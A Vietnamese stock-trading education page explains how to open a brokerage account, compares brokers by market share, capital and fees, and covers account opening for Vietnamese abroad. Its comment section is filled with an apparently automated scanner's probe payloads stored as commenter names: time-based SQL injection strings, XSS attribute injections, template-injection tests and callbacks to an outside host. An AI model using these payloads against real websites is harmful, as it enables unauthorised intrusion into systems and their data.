LỚP HỌC CHỨNG KHOÁN
Khách| Đăng nhập
Tư vấn Đầu tư chứng khoán
Mở tài khoản công ty chứng khoán uy tín

Bài viết Hướng dẫn Mở Tài khoản Chứng khoán là Bài viết Hướng dẫn chung cho những Người mới Tìm hiểu Chứng khoán cũng như có nhu cầu Mở Tài khoản Chứng khoán. Như các bạn đã biết, để có thể tham gia đầu tư chứng khoán (Giao dịch Mua / Bán chứng khoán) thì trước tiên bạn phải có một Tài khoản Chứng khoán. Bởi vậy, việc Mở Tài khoản Chứng khoán đóng vai trò rất quan trọng với nhà đầu tư và để các bạn có thể nắm được môt cách chi tiết về vấn đề này thì Bài viết sẽ trình bày cụ thể những Hướng dẫn cũng như thủ tục có thể có khi Mở tài khoản với nhiều Đối tượng và nhu cầu khác nhau. Các nội dung chính bao gồm:

 + Mở tài khoản chứng khoán ở đâu?

+ Điều kiện pháp lý cần thiết để có thể mở tài khoản

+ Cách mở tài khoản chứng khoán năm 2023

+ Nên mở tài khoản tại công ty chứng khoán nào?

 + Mở tài khoản chứng khoán – Nếu bạn là người Việt Nam ở nước ngoài.

1. Mở tài khoản chứng khoán ở đâu?

Như các bạn đã biết, khi chúng ta có nhu cầu giao dịch về tiền như: chuyển khoản, thanh toán tiền mua hàng, thanh toán hóa đơn….các bạn ra một ngân hàng bất kỳ mở tài khoản và bắt đầu sử dụng dịch vụ một cách dễ dàng sau khi được nhân viên nhân hàng hướng dẫn..

Tương tự như vậy, khi các bạn có nhu cầu tham gia đầu tư chứng khoán thì các bạn ra một Công ty chứng khoán bất kỳ mở một tài khoản và sử dụng một cách dễ dàng (mua/bán chứng khoán) sau khi được nhân viên công ty chứng khoán hướng dẫn một cách nhanh chóng (Vì sao muốn mở tài khoản chứng khoán các bạn lại phải ra công ty chứng khoán? Các bạn tham khảo bài viết Cách thức tổ chức hoạt động của thị trường chứng khoán Việt Nam.) và các bạn có thể xem danh sách các công ty chứng khoán ở Việt Nam hiện nay TẠI ĐÂY

—————————————————————

2. Điều kiện pháp lý cần thiết để có thể mở tài khoản

Cũng giống như các dịch vụ tài chính khác, bạn có thể mở tài khoản chứng khoán khi thỏa mãn 2 điều điều kiện sau:

  1. Bạn phải từ đủ 18 tuổi trở lên
  2. Đã có chứng minh thư nhân dân / Căn cước công dân

—————————————————————

3. Cách mở tài khoản chứng khoán năm 2023

Hiện nay, các bạn có thể mở tài khoản theo 3 hình thức sau

  • Mở trực tiếp tại văn phòng và điểm giao dịch của công ty chứng khoán
  • Mở tài khoản online/trực tuyến (đây là hình thức phổ biến hiện nay vì sự tiện dụng của nó).

3.1. Hình thức mở tài khoản trực tiếp

Đây là hình thức các bạn đến trực tiếp công ty hoặc văn phòng giao dịch của công ty chứng khoán để mở tài khoản.

Đây là Hình thức Mở phù hợp cho những bạn đang sống / làm việc hay có dịp qua được các Tỉnh / Thành phố – Nơi có các Công ty Chứng khoán đặt Văn phòng để hoàn thành Thủ tuc Mở ngay tại Công ty. Cách Mở này khá đơn giản, bạn chỉ cần mang theo CMND hoặc Thẻ căn cước gốc (yêu cầu bắt buộc) qua Văn phòng Chứng khoán mà bạn chọn trong Giờ hành chính từ Thứ 2 đến Thứ 6 hàng tuần (8h sáng đến 17h Chiều), đề nghị cho Mở Tài khoản Chứng khoán. Mọi Thủ tục Mở sau đó sẽ được Nhân viên ở đây hướng dẫn bạn thực hiện một cách chi tiết, sau khoảng 1h đồng hồ là bạn đã có Tài khoản Chứng khoán để giao dịch.

Các bạn có thể tham khảo Mạng lưới các công ty chứng khoánTẠI ĐÂY

—————————————————————

3.2. Mở tài khoản chứng khoán online (hay trực tuyến) – Đây là hình thức phổ biến hiện nay vì sự tiện dụng của nó.

Hình thức mở tài khoản chứng khoán trực tuyến mới bắt đầu triển khai từ năm 2020 dưới sự hỗ trợ của công nghệ, các bạn hoàn toàn có thể mở một tài khoản chứng khoán trực tuyến trong vòng 15 phút và đây là hình thức chính hiện nay mà nhiều nhà đầu tư đang sử dụng vì sự tiện dụng của nó.

Với hình thức này, bạn chi cần có điện thoại thông minh, ipad, láp tóp, hoặc máy tính để bàn có camera để gửi thông tin nhận diện khuân mặt, cũng như gửi ảnh chứng minh thư/căn cước công dân khi kê khai thông tin mở tài khoản.

Công việc cũng rất đơn giản, bạn truy cập vào website của công ty vào mục mở tài khoản, kê khai thông tin theo hướng dẫn, sau khoảng 15 phút là bạn có tài khoản để giao dịch. Bạn có thể tham khảo bài viết Mở tài khoản Chứng khoán bằng eKYC

Nếu bạn cần sự Hỗ trợ Tư vấn mở tài khoản chứng khoán và tư vấn Đầu tư cả sau khi mở tài khoản, các bạn Đăng ký Nhận Tư vấn Mở Tài khoản Chứng khoán tại  Form Đăng ký Nhận Tư vấn Mở tài khoản Chứng khoán hoặc các bạn để lại thông tin dưới đây mình sẽ liên hệ lại cho các bạn.

—————————————————————

4. Mở tài khoản chứng khoán ở đâu tốt nhất

Điều quan trọng khi lựa chọn Mở Tài khoản Chứng khoán Ở đâu Tốt nhất tùy thuộc vào từng người bởi mỗi người lại có một quan niệm tốt nhất khác nhau. Một số coi Phí & Lãi vay thấp là ưu tiên lớn nhất, một số khác lại ưu tiên Dịch vụ Tư vấn Hỗ trợ là tốt nhất (nhất là khách hàng mới tham gia), một số khác nữa lại coi Uy tín Thị phần là ưu tiên lớn nhất, … Thậm chí một số người lại muốn Thủ tục Mở Tài khoản Chứng khoán phải đơn giản nhất (Nhất là các bạn ở Tỉnh xa). Tổng hợp lại có các yếu tố sau đây:

4.1. Thị phần Môi giới Chứng khoán

Như vừa nói, mỗi người lại có những ưu tiên khác nhau cho các tiêu chí đánh giá. Tựu chung lại, nếu như Công ty Chứng khoán nào có Vốn lớn, Uy tín, Hệ thống tốt, Nhân sự Tốt, Phí & Lãi vay cạnh tranh, … và Chiến lược thu hút cũng như giữ chân Khách hàng và Nhân sự tốt nhất thì Giá trị Giao dịch Môi giới hay Thị phần sẽ là lớn nhất. Nếu như có một thang điểm Tổng thể 10 điểm để chọn Mở Tài khoản Chứng khoán Ở đâu Tốt nhất thì riêng yếu tố Thị phần này có thể chiếm tới 5 điểm vì nó dựa trên Kết quả và là Tổng hợp của mọi yếu tố.

Theo cập nhật mới nhất về Thị phần Môi giới Chứng khoán Cơ sở sàn chính HOSE 2022 thì Thị phần trong năm nay đã biến động và thay đổi mạnh. Nguyên nhân là do sự đổ vốn rất lớn từ các Công ty Chứng khoán hàng đầu như sự tham gia khá mạnh gần đây của Chứng khoán VPS. Với ưu thế Vốn Điều lệ lớn, Phí và Lãi vay cạnh tranh, Hệ thống tốt và Kinh nghiệm đi trước trong tiếp cận và phục vụ Khách hàng thì các cái tên mới này đã lần lượt thay thế cho các Công ty bị “out” ra khỏi Top 10 như SHS, ACBS, FPTS, … Đặc biệt là vị trí thứ 2 lần đầu tiên sau nhiều năm được thay thế bởi cái tên mới là Công ty Chứng khoán của Ngân hàng Việt Nam Thịnh Vượng – VPS. Dự kiến trong thời gian tới thì Top 3 cũng sẽ có thay đổi lớn.

Các bạn tham khảo Thị Phần môi giới của các công ty chứng khoán tại: Thị phần môi giới tại sở giao dịch chứng khoán TP HCM - HSX;

4.2. Uy tín, Thương hiệu:

Một trong những yếu tố quan trọng nhất của Uy tín trong ngành Chứng khoán là Thị phần Môi giới như đề cập ở trên. Công ty nào làm tốt, có uy tín thì mới thu hút được nhiều khách hàng. Đương nhiên bạn sẽ yên tâm hơn khi để một khối lượng lớn tài sản của mình tại những Công ty Chứng khoán có tên tuổi trên thị trường như các Công ty Chứng khoán nằm trong Top Thị phần (SSI, HSC, VCSC, VNDS, MAS) hoặc là con của các Ngân hàng, Tổ chức Bảo hiểm cũng sẽ có Uy tín thương hiệu nhất định (TCBS, VCBS, BVSC, ACBS, FPTS, …). Bên dưới là hình ảnh liệt kê một số Công ty Chứng khoán có Uy tín lớn trên thị trường, trong đó bên trái là Top 10 Công ty có Thị phần Môi giới Chứng khoán Cơ sở còn bên phải là một số Công ty Chứng khoán dựa vào tên tuổi của Công ty mẹ hoặc Tổ chức Tài chính lớn nước ngoài.

 4.3. Vốn Điều lệ: 

Là trong những tiêu chí rất quan trọng liên quan đến Uy tín và sự an toàn khi Khách hàng cân nhắc Mở Tài khoản Chứng khoán Ở đâu Tốt nhất, thông thường thì Công ty Chứng khoán có Vốn Điều lệ lớn sẽ vừa thể hiện cam kết Hoạt động lâu dài bền vững của Chủ Công ty đó, lại vừa thu hút được Dòng tiền, Khách hàng lớn đến. Qua đó giúp Lợi nhuận cao hơn vượt trội, đồng thời quay lại nâng cao Vốn của Công ty Chứng khoán đó và do đó càng củng cố sự an toàn lâu dài khi gửi gắm Tài khoản vào Công ty Chứng khoán đó. Dưới đây là Thống kê về Vốn Điều lệ, Vốn chủ sở hữu và Dư Nợ cho Vay của các Công ty Chứng khoán có Vốn Điều lệ > 1.000 tỷ đồng.

Mặc dù Việt Nam hiện có hơn 70 Công ty Chứng khoán nhưng chỉ có 23 Công ty có Vốn Điều lệ > 1.000 tỷ đồng. Dễ thấy các tên tuổi lớn nhất trong cả 3 Tiêu chí Tài chính quan trọng trên cũng gần như đồng thời là các Công ty có Thị phần Môi giới Cổ phiếu lớn nhất.

5. Phí Giao dịch và Dịch vụ Hỗ trợ:

Đây là 1 phần khá quan trọng khi Khách hàng cân nhắc lựa chọn Mở Tài khoản Chứng khoán Ở đâu Tốt nhất. Do mức phí đôi khi giữa các Công ty Chứng khoán chêch lệch rất lớn, đặc biệt là các Khách hàng nhỏ lẻ có Vốn Đầu tư < 1 tỷ đồng. Tuy nhiên do có sự Cạnh tranh giữa các công ty chứng khoán thì mức Phí rất cạnh 0,15% mà vẫn có sự Hỗ trợ Môi giới thay vì phải tận 0,25% hay 0,35% như trước đây nếu Giao dịch nhỏ trong ngày.

Một số Công ty Chứng khoán (Kể cả Công ty Chứng khoán lớn) có thêm cả chế độ Khách tự chơi, tự tìm hiểu và không có Hỗ trợ của Nhân viên Môi giới. Nếu như bạn là Người mới thì không nên chọn theo hướng này, vì khi mới tham gia Thị trường còn rất nhiều quy định bỡ ngỡ cần hỏi Tư vấn.

Như Bảng Tổng hợp trên ta dễ thấy nếu như bạn mới tham gia với số Vốn Đầu tư < 100 triệu đồng thì lần đầu tiên trong Top 5 có một Công ty Chứng khoán là VPS có mức phí 0,15% mà vẫn còn Môi giới. Còn lại đa phần khá cao, từ 0,25% đến 0,35%, Phí ứng trước & Vay Margin cũng lần đầu tiên có được là 12% / năm và đây là lý do Công ty này vươn lên mạnh trong Thời gian gần đây. Tin rằng thời gian tới các Công ty Chứng khoán hàng đầu khác cũng có hành động tương tự, qua đó giúp cho những người mới tham gia được thụ hưởng Mức Phí vừa phải cạnh tranh mà vẫn được Hỗ trợ.

Ngoài ra, còn có nhiều các Yếu tố khác nhưng hoặc là không được phân biệt rõ, hoặc là mang tính riêng cá nhân khi 1 ai đó lựa chọn Mở Tài khoản Chứng khoán Ở đâu Tốt nhất mà mình được nghe như: “Mở Agriseco vì Mình đang dùng sẵn Ngân hàng Agribank, chắc nó cùng Hệ thống thì tiền nong chắc dễ hơn”, “Mở vì Văn phòng Công ty Chứng khoán đó ngay cạnh Công ty anh”, … .

—————————————————————

6. Một vài Gợi ý khi chọn Mở Tài khoản Chứng khoán Ở đâu Tốt nhất

Như mình đã trình bày ở trên, mỗi người sẽ có ưu tiên cho từng tiêu chí khác nhau. Phần này mình sẽ đưa ra một số Lời khuyên giúp bạn lựa chọn nên Mở Tài khoản Chứng khoán Ở đâu Tốt nhất, đương nhiên quyết định cuối cùng vẫn là ở bạn.

– Nếu bạn là Cá nhân, mới tham gia và Vốn Đầu tư dự kiến < 1 tỷ đồng: thì nên lựa chọn các Công ty Chứng khoán trong Top 10, Phí cạnh tranh 0,15% và vẫn có Môi giới Hỗ trợ như: MAS, VPS, KIS.

– Nếu bạn là Cá nhân, mới tham gia và Vốn Đầu tư dự kiến > 5 tỷ đồng: lúc này bạn là Khách VIP bất kể ở Công ty Chứng khoán lớn hay nhỏ và sẽ được mặc định Phí phẳng 0,15% mà vẫn có Môi giới Hỗ trợ Tư vấn giải đáp. Do đó các tên tuổi hàng đầu sẽ là SSI, HSC, VNDS và VPS.

– Nếu bạn là Cá nhân, Ưu tiên Phí và Lãi vay Margin: các tên tuổi cạnh tranh hành đầu việc này là: MAS, VPS, KIS, … Đây là các Công ty Chứng khoán mới tăng Vốn gần đây và do đang cần đẩy Vốn ra nên thường có nhiều ưu đãi về Phí và Lãi suất Cho vay. Những ưu đãi đã góp phần các Công ty Chứng khoán này cải thiện Thị phần mạnh trong Thời gian gần đây.

- Nếu bạn là Cá nhân, Xác định Đầu tư lâu dài, Không vay, Không quan tâm Phí: theo tiêu chí này thì Khá đơn giản, SSI, HSC và các công ty chứng khoán của các ngân hàng lớn chống lưng là lựa chọn hàng đầu. Rất phù hợp Khách lớn, Đầu tư lâu dài. Tất nhiên bạn cần phải tìm được Nhân viên Môi giới phù hợp cho hướng Đầu tư lâu dài này.

– Nếu bạn là Tổ chức, muốn huy động Vốn qua Công ty Chứng khoán: nếu muốn huy động Vốn với giá thấp Cạnh tranh thì VPS là cái tên hàng đầu cho phân khúc này. Chi tiết cụ thể tùy vào mức độ lớn của “Deal” mà sẽ có mức đàm phán Lãi suất cụ thể. Trường hợp nếu bạn Tư vấn lên sàn kiêm Huy động Vốn qua Chào bán cho Đối tác Quỹ ngoại thì 3 cái tên hàng đầu lần lượt là Chứng khoán Bản Việt – VCSC, SSI và HSC.

– Nếu bạn là Cá nhân và muốn Mở trực tiếp nơi gần nhất: Bạn có thể tra cứu thông tin tại đây: Mạng lưới các Công ty Chứng khoán tại Việt Nam. Nếu bạn ở các Tỉnh / Thành phố lớn có Văn phòng Công ty Chứng khoán thì khá đơn giản, chiếu lại các lựa chọn trên và Tìm nơi gần nhất rồi cầm Chứng minh thư hoặc Căn cước qua Đăng ký Mở. Trường hợp bạn sống ở các Tỉnh / Thành phố không có Công ty Chứng khoán nào thì có thế Đăng ký Mở Từ xa như Hướng dẫn tại Link: Hướng dẫn Mở Tài khoản Chứng khoán Từ xa. Lưu ý là không thể Mở được Online như nhiều người nghĩ do Vấn đề Luật Chứng khoán quy định Khách hàng phải Ký Hợp đồng Mở thì mới có hiệu lực Mở. Xem thêm: Có Mở được Tài khoản Chứng khoán Online?

Như vậy bạn đã có cái nhìn tổng quan để quyết định nên Mở Tài khoản Chứng khoán Ở đâu Tốt nhất. Nếu bạn còn băn khoăn nào cần giải đáp thêm thì có thể liên hệ lại mình để nhận được những Tư vấn hữu ích nhất.

————————————————————

 

Hướng dẫn Mở Tài khoản Chứng khoán – Nếu bạn là người Việt Nam sống ở nước ngoài

Trước đây việc mở tài khoản chứng khoán cho người Việt Nam ở nước ngoài là rất khó, thường phải nhờ người nhà, thân, quen ở Việt Nam đứng ra mở giùm theo đúng các đối tượng vùng miền ở trên. Hoặc Mở Tài khoản Từ xa phải có cả gọi điện xác nhận thông tin, mà chỉ gọi điện được Số Điện thoại trong nước, nên về cơ bản là không thể mở từ xa nếu bạn đang sống ở nước ngoài. Một số Công ty Chứng khoán nhỏ vẫn mở được do họ không cần xác nhận thông tin, nhưng chi phí gửi đi lại hồ sơ sẽ khá tốn kém, và khi cần xử lí gấp 1 số thứ thì ở nước ngoài sẽ rất khó khăn.

Tuy nhiên, hiện nay với sự phát triển của công nghệ, các công ty chứng khoán đã cho phép mở tài khoản chứng khoán trực tuyến, đã tạo điều kiện cho các bạn người Việt Nam ở mọi nơi trên thế giới đều có thể mở tài khoản chứng khoán một cách dễ dàng. Chỉ cần các bạn vào website của công ty làm theo hướng dẫn là xong. (các bạn tham khảo webstie của các công ty ở Mục mở tài khoản trực tuyến hoặc xem thêm tại: Hướng dẫn Mở Tài khoản Chứng khoán cho người Việt Nam ở Nước ngoài

Trên đây là Hướng dẫn Mở Tài khoản Chứng khoán để các bạn nắm rõ được các cách Mở, nếu bạn vẫn còn thắc mắc và muốn được giải thích thêm thì có thể liên hệ mình theo Thông tin liên lạc phía trên hoặc để lại thông tin phía dưới và mình sẽ Hỗ trợ cho bạn.

Lớp học chứng khoán.
Tags: tài khoản chứng khoán, hướng dẫn mở tài khoản chứng khoán, mở tài khoản chứng khoán online, mở tài khoản chứng khoán trực tuyến, mở tài khoản chứng khoán từ xa, mở tài khỏa chứng khoàn ở đâu tốt nhất,;
Ý kiến bình luận:
0373121270
Người gửi: do hoang - (26/08/2023 03:03:05)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:57)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:54)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:19)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:16)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:13)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:11)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:09)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:06)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:04)

Người gửi: MWkSWxHJ - (04/12/2022 10:52:01)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:59)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:57)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:54)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:52)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:50)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:47)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:46)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:44)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:43)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:41)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:38)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:37)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:35)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:33)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:31)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:28)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:27)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:25)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:22)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:19)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:17)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:14)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:12)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:03)

Người gửi: MWkSWxHJ - (04/12/2022 10:51:02)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:59)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:57)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:56)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:55)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:54)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:51)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:50)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:48)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:47)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:45)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:43)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:42)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:39)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:34)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:31)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:28)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:25)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:22)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:22)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:20)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:19)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:19)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:18)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:18)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:16)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:16)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:15)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:15)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:15)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:13)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:13)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:12)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:10)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:10)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:09)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:07)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:06)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:06)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:05)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:05)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:04)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:03)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:02)

Người gửi: MWkSWxHJ - (04/12/2022 10:50:01)

Người gửi: NewsDetail.aspx/. - (04/12/2022 10:50:00)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:59)

Người gửi: MWkSWxHJ"sTYLe='acu:Expre/**/SSion(FyZs(9951))'bad=" - (04/12/2022 10:49:59)

Người gửi: NewsDetail.aspx - (04/12/2022 10:49:58)

Người gửi: �"onmouseover=FyZs(9212)// - (04/12/2022 10:49:57)

Người gửi: NewsDetail.aspx - (04/12/2022 10:49:56)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:56)

Người gửi: %4D%57%6B%53%57%78%48%4A%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%46%79%5A%73%28%39%35%32%33%29%22 - (04/12/2022 10:49:55)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:54)

Người gửi: MWkSWxHJ\u0022onmouseover=FyZs(9626)\u0022 - (04/12/2022 10:49:53)
NewsDetail.aspx/.
Người gửi: MWkSWxHJ - (04/12/2022 10:49:53)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:52)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:51)

Người gửi: MWkSWxHJ" nSjC=FyZs([!+!]) LIB=" - (04/12/2022 10:49:51)
NewsDetail.aspx
Người gửi: MWkSWxHJ - (04/12/2022 10:49:50)

Người gửi: MWkSWxHJ"onmouseover=FyZs(9512)" - (04/12/2022 10:49:49)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:49)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:48)
NewsDetail.aspx
Người gửi: MWkSWxHJ - (04/12/2022 10:49:48)

Người gửi: {{49727*49049}} - (04/12/2022 10:49:47)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:47)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:46)

Người gửi: acux7904��z1��z2a�bcxuca7904 - (04/12/2022 10:49:44)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:44)

Người gửi: acu3590<s1﹥s2ʺs3ʹuca3590 - (04/12/2022 10:49:43)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:42)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:41)

Người gửi: MWkSWxHJ9442974 - (04/12/2022 10:49:41)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:41)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:40)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:40)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:39)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:39)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:37)

Người gửi: /\xfs.bxss.me - (04/12/2022 10:49:37)
{{50324*50072}}
Người gửi: MWkSWxHJ - (04/12/2022 10:49:37)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:36)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:35)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:35)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:35)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:34)
acux4368��z1��z2a�bcxuca4368
Người gửi: MWkSWxHJ - (04/12/2022 10:49:33)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:33)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:33)

Người gửi: //xfs.bxss.me - (04/12/2022 10:49:33)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:33)

Người gửi: http://xfs.bxss.me - (04/12/2022 10:49:32)
acu7231<s1﹥s2ʺs3ʹuca7231
Người gửi: MWkSWxHJ - (04/12/2022 10:49:32)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:31)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:31)

Người gửi: 985418 - (04/12/2022 10:49:30)
9567483
Người gửi: MWkSWxHJ - (04/12/2022 10:49:30)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:30)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:29)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:29)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:29)

Người gửi: /xfs.bxss.me - (04/12/2022 10:49:28)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:27)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:27)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:26)
/\xfs.bxss.me
Người gửi: MWkSWxHJ - (04/12/2022 10:49:26)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:25)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:25)
//xfs.bxss.me
Người gửi: MWkSWxHJ - (04/12/2022 10:49:24)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:23)

Người gửi: '" - (04/12/2022 10:49:22)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:22)
http://xfs.bxss.me
Người gửi: MWkSWxHJ - (04/12/2022 10:49:22)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:21)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:21)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:21)
990683
Người gửi: MWkSWxHJ - (04/12/2022 10:49:20)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:19)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:19)
'"
Người gửi: MWkSWxHJ - (04/12/2022 10:49:19)
/xfs.bxss.me
Người gửi: MWkSWxHJ - (04/12/2022 10:49:18)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:17)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:17)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:16)

Người gửi: ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) - (04/12/2022 10:49:16)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:15)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Người gửi: MWkSWxHJ - (04/12/2022 10:49:14)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:14)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:14)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:13)

Người gửi: MWkSWxHJ'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||' - (04/12/2022 10:49:12)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:12)

Người gửi: QAwS7PkH')) OR 601=(SELECT 601 FROM PG_SLEEP(12))-- - (04/12/2022 10:49:11)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:10)

Người gửi: nORWYPd9') OR 940=(SELECT 940 FROM PG_SLEEP(12))-- - (04/12/2022 10:49:10)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:10)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:10)

Người gửi: dO7ZXJXj' OR 731=(SELECT 731 FROM PG_SLEEP(12))-- - (04/12/2022 10:49:09)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:09)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:09)

Người gửi: OnwyjXnx')); waitfor delay '0:0:12' -- - (04/12/2022 10:49:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:08)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:07)

Người gửi: h8ifFL1N'); waitfor delay '0:0:12' -- - (04/12/2022 10:49:07)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:06)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:06)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:05)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:04)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:03)

Người gửi: eE06vvI5'; waitfor delay '0:0:12' -- - (04/12/2022 10:49:02)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:02)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:01)

Người gửi: 1 waitfor delay '0:0:12' -- - (04/12/2022 10:49:01)

Người gửi: MWkSWxHJ - (04/12/2022 10:49:00)

Người gửi: (select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/ - (04/12/2022 10:48:59)

